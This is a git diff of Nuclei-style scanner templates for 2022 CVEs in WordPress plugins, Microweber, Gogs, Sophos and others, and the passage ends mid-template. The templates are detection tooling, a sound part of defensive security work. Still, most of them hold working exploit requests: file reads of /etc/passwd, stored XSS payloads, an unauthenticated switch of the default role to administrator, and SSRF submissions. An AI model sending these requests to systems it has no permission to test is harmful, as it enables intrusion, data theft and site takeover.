     - https://www.wordfence.com/blog/2022/02/reflected-cross-site-scripting-vulnerability-patched-in-wordpress-profile-builder-plugin/
-  classification:
-    cve-id: CVE-2022-0653
+    - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=2655168%40profile-builder&new=2655168%40profile-builder&sfp_email=&sfph_mail=
   remediation: Upgrade to version 3.6.5 or later.
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2022-0653
+    cwe-id: CWE-79
   tags: cve,cve2022,wordpress,xss,wp-plugin
 
 requests:
diff --git a/cves/2022/CVE-2022-0656.yaml b/cves/2022/CVE-2022-0656.yaml
new file mode 100644
index 0000000000..0cef636e67
--- /dev/null
+++ b/cves/2022/CVE-2022-0656.yaml
@@ -0,0 +1,44 @@
+id: CVE-2022-0656
+
+info:
+  name: uDraw <3.3.3 - Local File Inclusion
+  author: akincibor
+  severity: high
+  description: uDraw before 3.3.3 does not validate the url parameter in its udraw_convert_url_to_base64 AJAX action (available to both unauthenticated and authenticated users) before using it in the file_get_contents function and returning its content base64 encoded in the response. As a result, unauthenticated users could read arbitrary files on the web server (such as /etc/passwd, wp-config.php etc).
+  reference:
+    - https://wpscan.com/vulnerability/925c4c28-ae94-4684-a365-5f1e34e6c151
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-0656
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2022-0656
+    cwe-id: CWE-552
+  metadata:
+    google-query: inurl:"/wp-content/plugins/udraw"
+    verified: "true"
+  tags: wp,wordpress,wp-plugin,unauth,cve,cve2022,lfi,udraw,wpscan
+
+requests:
+  - raw:
+      - |
+        POST /wp-admin/admin-ajax.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+        X-Requested-With: XMLHttpRequest
+
+        action=udraw_convert_url_to_base64&url=/etc/passwd
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        words:
+          - "cm9vd" # root in base64
+          - "data:image\\/;base64"
+        condition: and
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/07/22
diff --git a/cves/2022/CVE-2022-0660.yaml b/cves/2022/CVE-2022-0660.yaml
new file mode 100644
index 0000000000..9cdc808f6e
--- /dev/null
+++ b/cves/2022/CVE-2022-0660.yaml
@@ -0,0 +1,50 @@
+id: CVE-2022-0660
+
+info:
+  name: Microweber < 1.2.11 - Information Disclosure
+  author: amit-jd
+  severity: high
+  description: |
+    Generation of error message containing sensitive information while viewing comments from "load_module:comments#search="in Packagist microweber/microweber prior to 1.2.11.
+  reference:
+    - https://huntr.dev/bounties/01fd2e0d-b8cf-487f-a16c-7b088ef3a291/
+    - https://github.com/advisories/GHSA-hhrj-wp42-32v3
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-0660
+    - https://huntr.dev/bounties/01fd2e0d-b8cf-487f-a16c-7b088ef3a291
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2022-0660
+    cwe-id: CWE-209
+  metadata:
+    verified: "true"
+  tags: cve2022,microweber,disclosure,authenticated,huntr,cve
+
+requests:
+  - raw:
+      - |
+        POST /api/user_login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        username={{username}}&password={{password}}
+
+      - |
+        POST /module/ HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+        Referer: {{BaseURL}}admin/view:comments
+
+        class=+module+module-comments-manage+&id=mw_admin_posts_with_comments&data-type=comments%2Fmanage&parent-module-id=mw-main-module-backend&parent-module=comments&data-search-keyword={{randstr}}
+
+    req-condition: true
+    cookie-reuse: true
+    matchers:
+      - type: dsl
+        dsl:
+          - contains(body_2,'QueryException')
+          - contains(body_2,'SQLSTATE')
+          - contains(body_2,'runQueryCallback')
+          - 'contains(all_headers_2,"text/html")'
+          - 'status_code_2==500'
+        condition: and
diff --git a/cves/2022/CVE-2022-0692.yaml b/cves/2022/CVE-2022-0692.yaml
index 678c451a9c..209d4d8f64 100644
--- a/cves/2022/CVE-2022-0692.yaml
+++ b/cves/2022/CVE-2022-0692.yaml
@@ -4,27 +4,28 @@ info:
   name: Rudloff alltube prior to 3.0.1 - Open Redirect
   author: 0x_Akoko
   severity: medium
-  description: An open redirect vulnerability exists in Rudloff/alltube that could let an attacker construct a URL within the application that causes redirection to an arbitrary external domain via Packagist in versions
-    prior to 3.0.1.
+  description: An open redirect vulnerability exists in Rudloff/alltube that could let an attacker construct a URL within the application that causes redirection to an arbitrary external domain via Packagist in versions prior to 3.0.1.
   reference:
     - https://huntr.dev/bounties/4fb39400-e08b-47af-8c1f-5093c9a51203/
-    - https://www.cvedetails.com/cve/CVE-2022-0692
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-0692
+    - https://huntr.dev/bounties/4fb39400-e08b-47af-8c1f-5093c9a51203
+    - https://github.com/rudloff/alltube/commit/bc14b6e45c766c05757fb607ef8d444cbbfba71a
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2022-0692
     cwe-id: CWE-601
-  tags: cve,cve2022,redirect,rudloff,alltube
+  tags: huntr,cve,cve2022,redirect,rudloff,alltube
 
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/index.php/example.com'
+      - '{{BaseURL}}/index.php/interact.sh'
 
     matchers:
       - type: regex
         part: header
         regex:
-          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
 
 # Enhanced by mp on 2022/03/08
diff --git a/cves/2022/CVE-2022-0776.yaml b/cves/2022/CVE-2022-0776.yaml
new file mode 100644
index 0000000000..ccb342d206
--- /dev/null
+++ b/cves/2022/CVE-2022-0776.yaml
@@ -0,0 +1,34 @@
+id: CVE-2022-0776
+
+info:
+  name: RevealJS postMessage Cross-Site Scripting
+  author: LogicalHunter
+  severity: medium
+  description: Cross-site Scripting (XSS) - DOM in GitHub repository hakimel/reveal.js prior to 4.3.0.
+  reference:
+    - https://hackerone.com/reports/691977
+    - https://github.com/hakimel/reveal.js/pull/3137
+    - https://huntr.dev/bounties/be2b7ee4-f487-42e1-874a-6bcc410e4001/
+  classification:
+    cve-id: CVE-2022-0776
+  tags: hackerone,huntr,cve,cve2022,headless,postmessage,revealjs
+
+headless:
+  - steps:
+      - args:
+          url: "{{BaseURL}}"
+        action: navigate
+      - action: waitload
+      - action: script
+        name: extract
+        args:
+          code: |
+            () => {
+            return (Reveal.VERSION <= "3.8.0" || Reveal.VERSION < "4.3.0")
+            }
+
+    matchers:
+      - type: word
+        part: extract
+        words:
+          - "true"
diff --git a/cves/2022/CVE-2022-0870.yaml b/cves/2022/CVE-2022-0870.yaml
new file mode 100644
index 0000000000..e97ed1ef8a
--- /dev/null
+++ b/cves/2022/CVE-2022-0870.yaml
@@ -0,0 +1,54 @@
+id: CVE-2022-0870
+
+info:
+  name: Gogs - SSRF
+  author: Akincibor
+  severity: medium
+  description: Server-Side Request Forgery (SSRF) in Gogs prior to 0.12.5.
+  reference:
+    - https://huntr.dev/bounties/327797d7-ae41-498f-9bff-cc0bf98cf531/
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-0870
+    - https://github.com/gogs/gogs/commit/91f2cde5e95f146bfe4765e837e7282df6c7cabb
+    - https://huntr.dev/bounties/327797d7-ae41-498f-9bff-cc0bf98cf531
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 5.3
+    cve-id: CVE-2022-0870
+    cwe-id: CWE-918
+  metadata:
+    shodan-query: http.favicon.hash:-449283196
+  tags: cve,cve2022,ssrf,gogs,huntr
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    extractors:
+      - type: regex
+        name: version
+        internal: true
+        group: 1
+        regex:
+          - '<div class="ui left">\n\s+© \d{4} Gogs Version: ([\d.]+) Page:'
+
+      - type: regex
+        group: 1
+        regex:
+          - '<div class="ui left">\n\s+© \d{4} Gogs Version: ([\d.]+) Page:'
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        part: body
+        regex:
+          - '<div class="ui left">\n\s+© \d{4} Gogs Version: ([\d.]+) Page:'
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '< 0.12.5')
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2022/CVE-2022-0928.yaml b/cves/2022/CVE-2022-0928.yaml
new file mode 100644
index 0000000000..2b0f7b1181
--- /dev/null
+++ b/cves/2022/CVE-2022-0928.yaml
@@ -0,0 +1,55 @@
+id: CVE-2022-0928
+
+info:
+  name: Microweber - Cross-Site Scripting
+  author: amit-jd
+  severity: medium
+  description: |
+    Cross-site Scripting (XSS) discovered in microweber prior to 1.2.12. Type parameter in the body of POST request triggered by add/edit tax in microweb are vulnerable to stored XSS.
+  reference:
+    - https://huntr.dev/bounties/085aafdd-ba50-44c7-9650-fa573da29bcd
+    - https://github.com/microweber/microweber/commit/fc9137c031f7edec5f50d73b300919fb519c924a
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-0928
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 5.4
+    cve-id: CVE-2022-0928
+    cwe-id: CWE-79
+  metadata:
+    verified: "true"
+  tags: authenticated,huntr,cve,cve2022,xss,microweber,cms
+
+requests:
+  - raw:
+      - |
+        POST /api/user_login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        username={{username}}&password={{password}}
+
+      - |
+        POST /api/shop/save_tax_item HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+        Referer: {{BaseURL}}/admin/view:settings
+
+        id=0&name=vat1&type="><img+src%3dx+onerror%3dalert(document.domain)>&rate=10
+
+      - |-
+        POST /module HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+        Referer:{{BaseURL}}/admin/view:settings
+
+        class=+module+module-shop-taxes-admin-list-taxes+&id=mw_admin_shop_taxes_items_list&parent-module-id=settings-admin-mw-main-module-backend-shop-taxes-admin&parent-module=shop%2Ftaxes%2Fadmin&data-type=shop%2Ftaxes%2Fadmin_list_taxes
+
+    req-condition: true
+    cookie-reuse: true
+    matchers:
+      - type: dsl
+        dsl:
+          - contains(body_3,'<td>\"><img src=x onerror=alert(document.domain)></td>')
+          - 'contains(all_headers_3,"text/html")'
+          - 'status_code==200'
+        condition: and
diff --git a/cves/2022/CVE-2022-0952.yaml b/cves/2022/CVE-2022-0952.yaml
new file mode 100644
index 0000000000..c51d27c117
--- /dev/null
+++ b/cves/2022/CVE-2022-0952.yaml
@@ -0,0 +1,52 @@
+id: CVE-2022-0952
+
+info:
+  name: Sitemap by click5 < 1.0.36 - Unauthenticated Arbitrary Options Update
+  author: random-robbie
+  severity: high
+  description: |
+    The plugin does not have authorisation and CSRF checks when updating options via a REST endpoint, and does not ensure that the option to be updated belongs to the plugin
+  reference:
+    - https://wpscan.com/vulnerability/0f694961-afab-44f9-846c-e80a0f6c768b
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-0952
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
+    cve-id: CVE-2022-0952
+    cwe-id: CWE-862
+  metadata:
+    verified: "true"
+  tags: wp,wp-plugin,sitemap,wpscan,cve,cve2022,wordpress
+
+requests:
+  - raw:
+      - |
+        POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1
+        Host: {{Hostname}}
+        Content-type: application/json;charset=UTF-8
+
+        {"users_can_register":"1"}
+
+      - |
+        POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1
+        Host: {{Hostname}}
+        Content-type: application/json;charset=UTF-8
+
+        {"default_role":"administrator"}
+
+      - |
+        POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1
+        Host: {{Hostname}}
+        Content-type: application/json;charset=UTF-8
+
+        {"users_can_register":"0"}
+
+    req-condition: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(all_headers, "application/json")'
+          - "status_code == 200"
+          - "contains(body_1, 'users_can_register')"
+          - "contains(body_2, 'default_role')"
+        condition: and
diff --git a/cves/2022/CVE-2022-0954.yaml b/cves/2022/CVE-2022-0954.yaml
new file mode 100644
index 0000000000..22fe60f897
--- /dev/null
+++ b/cves/2022/CVE-2022-0954.yaml
@@ -0,0 +1,57 @@
+id: CVE-2022-0954
+
+info:
+  name: Microweber - Cross-Site Scripting
+  author: amit-jd
+  severity: medium
+  description: |
+    Multiple Stored Cross-site Scripting (XSS) Vulnerabilities in Shop's Other Settings, Shop's Autorespond E-mail Settings and Shops' Payments Methods in GitHub repository microweber/microweber prior to 1.2.11.
+  reference:
+    - https://github.com/advisories/GHSA-8c76-mxv5-w4g8
+    - https://huntr.dev/bounties/b99517c0-37fc-4efa-ab1a-3591da7f4d26/
+    - https://github.com/microweber/microweber/commit/955471c27e671c49e4b012e3b120b004082ac3f7
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-0954
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 5.4
+    cve-id: CVE-2022-0954
+    cwe-id: CWE-79
+  metadata:
+    verified: "true"
+  tags: cve,cve2022,xss,microweber,huntr
+
+requests:
+  - raw:
+      - |
+        POST /api/user_login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        username={{username}}&password={{password}}
+
+      - |
+        POST /api/save_option HTTP/2
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+        Referer: {{BaseURL}}/admin/view:shop/action:options
+
+        option_key=checkout_url&option_group=shop&option_value=%22%3E%3CiMg+SrC%3D%22x%22+oNeRRor%3D%22alert(document.domain)%3B%22%3E&module=shop%2Forders%2Fsettings%2Fother
+
+      - |
+        POST /module/ HTTP/2
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+        Referer: {{BaseURL}}/admin/view:shop/action:options
+
+        module=settings%2Fsystem_settings&id=settings_admin_mw-main-module-backend-settings-admin&class=card-body+pt-3&option_group=shop%2Forders%2Fsettings%2Fother&is_system=1&style=position%3A+relative%3B
+
+    cookie-reuse: true
+    req-condition: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(body_2,"true")'
+          - contains(body_3,'\"><img src=\"x\" onerror=\"alert(document.domain);\">\" placeholder=\"Use default')
+          - 'contains(all_headers_3,"text/html")'
+          - 'status_code_3==200'
+        condition: and
diff --git a/cves/2022/CVE-2022-0963.yaml b/cves/2022/CVE-2022-0963.yaml
new file mode 100644
index 0000000000..3397249689
--- /dev/null
+++ b/cves/2022/CVE-2022-0963.yaml
@@ -0,0 +1,69 @@
+id: CVE-2022-0963
+
+info:
+  name: Microweber > 1.2.12 - Cross-Site Scripting
+  author: amit-jd
+  severity: medium
+  description: |
+    Microweber prior to 1.2.12 allows unrestricted upload of XML files, which malicious actors can exploit to cause a stored cross-site scripting attack.
+  reference:
+    - https://huntr.dev/bounties/a89a4198-0880-4aa2-8439-a463f39f244c/
+    - https://github.com/advisories/GHSA-q3x2-jvp3-wj78
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-0963
+    - https://huntr.dev/bounties/a89a4198-0880-4aa2-8439-a463f39f244c
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 5.4
+    cve-id: CVE-2022-0963
+    cwe-id: CWE-79
+  metadata:
+    verified: "true"
+  tags: xss,microweber,cms,authenticated,huntr,cve,cve2022,intrusive
+
+requests:
+  - raw:
+      - |
+        POST /api/user_login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        username={{username}}&password={{password}}
+
+      - |
+        POST /plupload HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=---------------------------59866212126262636974202255034
+        Referer: {{BaseURL}}admin/view:modules/load_module:files
+
+        -----------------------------59866212126262636974202255034
+        Content-Disposition: form-data; name="name"
+
+        {{randstr}}.xml
+        -----------------------------59866212126262636974202255034
+        Content-Disposition: form-data; name="chunk"
+
+        0
+        -----------------------------59866212126262636974202255034
+        Content-Disposition: form-data; name="chunks"
+
+        1
+        -----------------------------59866212126262636974202255034
+        Content-Disposition: form-data; name="file"; filename="blob"
+        Content-Type: application/octet-stream
+
+        <x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(document.domain)</x:script>
+        -----------------------------59866212126262636974202255034--
+
+      - |
+        GET /userfiles/media/default/{{to_lower("{{randstr}}")}}.xml HTTP/1.1
+        Host: {{Hostname}}
+
+    req-condition: true
+    cookie-reuse: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(body_3,"alert(document.domain)")'
+          - 'status_code_3==200'
+          - 'contains(body_2,"bytes_uploaded")'
+        condition: and
diff --git a/cves/2022/CVE-2022-0968.yaml b/cves/2022/CVE-2022-0968.yaml
new file mode 100644
index 0000000000..7f6d1ea147
--- /dev/null
+++ b/cves/2022/CVE-2022-0968.yaml
@@ -0,0 +1,77 @@
+id: CVE-2022-0968
+
+info:
+  name: Microweber < 1.2.12 - Integer Overflow (DOS)
+  author: amit-jd
+  severity: medium
+  description: |
+    The microweber application allows large characters to insert in the input field "first & last name" which can allow attackers to cause a Denial of Service (DoS) via a crafted HTTP request. The first name & last name input should be limited to 50 characters or max 100 characters.
+  reference:
+    - https://huntr.dev/bounties/97e36678-11cf-42c6-889c-892d415d9f9e/
+    - https://github.com/advisories/GHSA-5fxv-xx5p-g2fv
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-0968
+    - https://huntr.dev/bounties/97e36678-11cf-42c6-889c-892d415d9f9e
+  classification:
+    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
+    cvss-score: 5.5
+    cve-id: CVE-2022-0968
+    cwe-id: CWE-190
+  tags: cve,cve2022,overflow,microweber,cms,huntr
+
+variables:
+  payload: '{{repeat("A", 600)}}'
+
+requests:
+  - raw:
+      - |
+        POST /api/user_login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        username={{username}}&password={{password}}
+
+      - |
+        GET /admin/view:modules/load_module:users/edit-user:2 HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        POST /api/user/2 HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+        thumbnail=&id=2&token={{form_token}}&_method=PATCH&username={{user}}&verify_password=&first_name={{payload}}&last_name=test&email={{email}}&phone=&is_admin=0&is_active=1&basic_mode=0&api_key=
+
+    req-condition: true
+    cookie-reuse: true
+    matchers:
+      - type: dsl
+        dsl:
+          - contains(body_3,'\"first_name\":\"{{payload}}\"')
+          - 'status_code_3==200'
+          - 'contains(all_headers_3,"application/json")'
+        condition: and
+
+    extractors:
+      - type: regex
+        part: body
+        name: form_token
+        internal: true
+        group: 1
+        regex:
+          - '<input type="hidden" name="token" value="(.*)" autocomplete="off">'
+
+      - type: regex
+        part: body
+        name: user
+        internal: true
+        group: 1
+        regex:
+          - '<input type="text" class="form-control" name="username" value="(.*)">'
+
+      - type: regex
+        part: body
+        name: email
+        internal: true
+        group: 1
+        regex:
+          - '<input type="email" class="form-control" name="email" value="(.*)">'
diff --git a/cves/2022/CVE-2022-1020.yaml b/cves/2022/CVE-2022-1020.yaml
index 57a2791aee..4293352fff 100644
--- a/cves/2022/CVE-2022-1020.yaml
+++ b/cves/2022/CVE-2022-1020.yaml
@@ -1,16 +1,19 @@
 id: CVE-2022-1020
 
 info:
-  name: Woo Product Table < 3.1.2 - Unauthenticated Arbitrary Function Call
+  name: WordPress WooCommerce <3.1.2 - Arbitrary Function Call
   author: Akincibor
-  severity: high
-  description: The Product Table for WooCommerce (wooproducttable) WordPress plugin before 3.1.2 does not have authorisation and CSRF checks in the wpt_admin_update_notice_option AJAX action (available to both unauthenticated and authenticated users), as well as does not validate the callback parameter, allowing unauthenticated attackers to call arbitrary functions with either none or one user controlled argument
+  severity: critical
+  description: WordPress WooCommerce plugin before 3.1.2 does not have authorisation and CSRF checks in the wpt_admin_update_notice_option AJAX action (available to both unauthenticated and authenticated users), as well as does not validate the callback parameter, allowing unauthenticated attackers to call arbitrary functions with either none or one user controlled argument.
   reference:
     - https://wpscan.com/vulnerability/04fe89b3-8ad1-482f-a96d-759d1d3a0dd5
     - https://nvd.nist.gov/vuln/detail/CVE-2022-1020
   classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
     cve-id: CVE-2022-1020
-  tags: wp,wp-plugin,wordpress,cve,cve2022,unauth
+    cwe-id: CWE-352,CWE-862
+  tags: wpscan,wp,wp-plugin,wordpress,cve,cve2022,unauth
 
 requests:
   - raw:
@@ -39,3 +42,5 @@ requests:
         group: 1
         regex:
           - '>PHP Version <\/td><td class="v">([0-9.]+)'
+
+# Enhanced by mp on 2022/05/18
diff --git a/cves/2022/CVE-2022-1040.yaml b/cves/2022/CVE-2022-1040.yaml
index 6edc4ffd3d..c21e4a0d94 100644
--- a/cves/2022/CVE-2022-1040.yaml
+++ b/cves/2022/CVE-2022-1040.yaml
@@ -1,24 +1,25 @@
 id: CVE-2022-1040
 
 info:
-  name: Sophos Firewall - RCE
+  name: Sophos Firewall <=18.5 MR3 - Remote Code Execution
   author: For3stCo1d
   severity: critical
   description: |
-    An authentication bypass vulnerability in the User Portal and Webadmin allows a remote attacker to execute code in Sophos Firewall version v18.5 MR3 and older.
+    Sophos Firewall version v18.5 MR3 and older contains an authentication bypass vulnerability in the User Portal and Webadmin which could allow a remote attacker to execute code.
   reference:
     - https://github.com/killvxk/CVE-2022-1040
     - https://github.com/CronUp/Vulnerabilidades/blob/main/CVE-2022-1040_checker
     - https://nvd.nist.gov/vuln/detail/CVE-2022-1040
+    - https://www.sophos.com/en-us/security-advisories/sophos-sa-20220325-sfos-rce
   classification:
-    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2022-1040
     cwe-id: CWE-287
   metadata:
-    verified: true
     shodan-query: http.title:"Sophos"
-  tags: cve,cve2022,sophos,firewall,auth-bypass
+    verified: "true"
+  tags: cve,cve2022,sophos,firewall,auth-bypass,rce,kev
 
 requests:
   - method: POST
@@ -43,3 +44,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/05/19
diff --git a/cves/2022/CVE-2022-1054.yaml b/cves/2022/CVE-2022-1054.yaml
index 923cc0d856..e72719b86f 100644
--- a/cves/2022/CVE-2022-1054.yaml
+++ b/cves/2022/CVE-2022-1054.yaml
@@ -8,9 +8,11 @@ info:
   reference:
     - https://wpscan.com/vulnerability/95a5fad1-e823-4571-8640-19bf5436578d
   classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 5.3
     cve-id: CVE-2022-1054
     cwe-id: CWE-862
-  tags: wp,wp-plugin,wordpress,cve,cve2022
+  tags: wordpress,cve,cve2022,wpscan,wp,wp-plugin
 
 requests:
   - method: GET
diff --git a/cves/2022/CVE-2022-1119.yaml b/cves/2022/CVE-2022-1119.yaml
index 788e431fa4..2e0ecf66e8 100644
--- a/cves/2022/CVE-2022-1119.yaml
+++ b/cves/2022/CVE-2022-1119.yaml
@@ -1,18 +1,22 @@
 id: CVE-2022-1119
 
 info:
-  name: WordPress Simple File List < 3.2.8 - Arbitrary File Retrieval
+  name: WordPress Simple File List <3.2.8 - Local File Inclusion
   author: random-robbie
   severity: high
   description: |
-    The Wordpress plugin is vulnerable to arbitrary file retrieval via the eeFile parameter found in the ~/includes/ee-downloader.php file due to missing controls which make it possible for unauthenticated attackers retrieve arbitrary files.
+    WordPress Simple File List before 3.2.8 is vulnerable to local file inclusion via the eeFile parameter in the ~/includes/ee-downloader.php due to missing controls which make it possible for unauthenticated attackers retrieve arbitrary files.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2022-1119
     - https://wpscan.com/vulnerability/5551038f-64fb-44d8-bea0-d2f00f04877e
+    - https://wpscan.com/vulnerability/075a3cc5-1970-4b64-a16f-3ec97e22b606
+    - https://plugins.trac.wordpress.org/browser/simple-file-list/trunk/includes/ee-downloader.php?rev=2071880
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-1119
   classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
     cve-id: CVE-2022-1119
-    cwe-id: CWE-552
-  tags: cve,cve2022,lfi,wordpress
+    cwe-id: CWE-22
+  tags: wp,wp-plugin,wpscan,cve,cve2022,lfi,wordpress
 
 requests:
   - method: GET
@@ -21,6 +25,7 @@ requests:
 
     matchers-condition: and
     matchers:
+
       - type: word
         part: body
         words:
@@ -31,3 +36,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/29
diff --git a/cves/2022/CVE-2022-1221.yaml b/cves/2022/CVE-2022-1221.yaml
index 65c2dc6a32..557595f1fe 100644
--- a/cves/2022/CVE-2022-1221.yaml
+++ b/cves/2022/CVE-2022-1221.yaml
@@ -1,7 +1,7 @@
 id: CVE-2022-1221
 
 info:
-  name: Gwyn's Imagemap Selector <= 0.3.3 - Reflected Cross-Site Scripting
+  name: Gwyn's Imagemap Selector <= 0.3.3 - Cross-Site Scripting
   author: veshraj
   severity: medium
   description: |
@@ -10,10 +10,13 @@ info:
     - https://wpscan.com/vulnerability/641be9f6-2f74-4386-b16e-4b9488f0d2a9
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1221
   classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
     cve-id: CVE-2022-1221
+    cwe-id: CWE-79
   metadata:
-    verified: true
-  tags: xss,wordpress,wp-plugin,wp,cve,cve2022
+    verified: "true"
+  tags: cve2022,wpscan,xss,wordpress,wp-plugin,wp,cve
 
 requests:
   - method: GET
diff --git a/cves/2022/CVE-2022-1386.yaml b/cves/2022/CVE-2022-1386.yaml
new file mode 100644
index 0000000000..6f289f524d
--- /dev/null
+++ b/cves/2022/CVE-2022-1386.yaml
@@ -0,0 +1,96 @@
+id: CVE-2022-1386
+
+info:
+  name: WordPress Fusion Builder < 3.6.2 - Unauthenticated SSRF
+  author: akincibor,MantisSTS,calumjelrick
+  severity: critical
+  description: |
+    The plugin, used in the Avada theme, does not validate a parameter in its forms which could be used to initiate arbitrary HTTP requests. The data returned is then reflected back in the application's response. This could be used to interact with hosts on the server's local network bypassing firewalls and access control measures.
+  reference:
+    - https://wpscan.com/vulnerability/bf7034ab-24c4-461f-a709-3f73988b536b
+    - https://www.rootshellsecurity.net/rootshell-discovered-a-critical-vulnerability-in-top-wordpress-theme/
+    - https://theme-fusion.com/version-7-6-2-security-update/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2022-1386
+    cwe-id: CWE-918
+  tags: wpscan,cve,cve2022,wordpress,ssrf,themefusion,wp,fusion,avada
+
+requests:
+  - raw:
+      - |
+        POST /wp-admin/admin-ajax.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+        Origin: {{BaseURL}}
+        Referer: {{RootURL}}
+
+        action=fusion_form_update_view
+
+      - |
+        POST /wp-admin/admin-ajax.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=---------------------------30259827232283860776499538268
+        Origin: {{BaseURL}}
+        Referer: {{RootURL}}
+
+        -----------------------------30259827232283860776499538268
+        Content-Disposition: form-data; name="formData"
+
+        email=example%40example.com&fusion_privacy_store_ip_ua=false&fusion_privacy_expiration_interval=48&priva
+        cy_expiration_action=ignore&fusion-form-nonce-0={{fusionformnonce}}&fusion-fields-hold-private-data=
+        -----------------------------30259827232283860776499538268
+        Content-Disposition: form-data; name="action"
+
+        fusion_form_submit_form_to_url
+        -----------------------------30259827232283860776499538268
+        Content-Disposition: form-data; name="fusion_form_nonce"
+
+        {{fusionformnonce}}
+        -----------------------------30259827232283860776499538268
+        Content-Disposition: form-data; name="form_id"
+
+        0
